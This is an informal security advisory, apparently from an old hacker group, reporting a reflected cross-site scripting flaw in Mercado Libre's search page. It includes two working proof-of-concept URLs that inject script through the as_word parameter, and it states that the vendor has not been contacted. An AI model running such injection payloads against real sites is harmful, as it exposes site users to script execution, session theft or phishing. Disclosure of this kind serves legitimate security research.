Security .Net Information Advisore:

Mercado Libre Vulnerabilities:
Cross-Site Scripting
Cross-Agent Script
Input Validation Error

Search in mercadolibre (all countries) permits cross site scripting Attacks (search?as_display_type=G&as_word=CODE).
A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser

Live demo:


http://www.mercadolibre.com/jm/search?as_display_type=G&as_word=%3Ca%20href=javascript:alert('snilabs-greetz:arielutn@gmail.com')%3E%3Cimg%20src=http://www.geocities.com/promospeedy/infobugs/logo1.jpg%3E%3C/a%3E

http://www.mercadolibre.com/jm/search?as_display_type=G&as_word=%3Cscript%3Ealert('snilabs%20-%20%20greetz:%20arielutn@gmail.com')%3C/script%3E



Vendor Contacted: not yet.. lol
Vuln Greetz, Credits and Discovery: Ariel (arielutn@gmail.com)
Snilabs greetz: A|iazar, Dar, El_Aventurero, Cyrus, GuS, Farynrl, mmm is much.. so nothing more